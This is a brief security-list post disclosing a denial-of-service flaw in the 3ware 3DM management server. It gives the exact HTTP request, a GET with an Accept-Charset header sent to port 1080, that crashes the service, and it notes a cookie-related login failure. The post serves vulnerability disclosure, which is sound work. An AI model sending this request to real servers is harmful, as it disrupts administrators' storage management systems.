3Ware 3DM denial of service attack

["Neulinger, Nathan" <nneul () umr edu>]

I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.

If you connect to 3dm port 1080 on either linux or windows and send:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

3dm server will terminate immediately.


Other 3dm problems - it flips out and refuses to accept a login if you
have ANY cookies sent. This screws you over if you have a sitewide
.domain.edu cookie for example. 

-- Nathan

------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul () umr edu
University of Missouri - Rolla         Phone: (573) 341-4841
Computing Services                       Fax: (573) 341-4216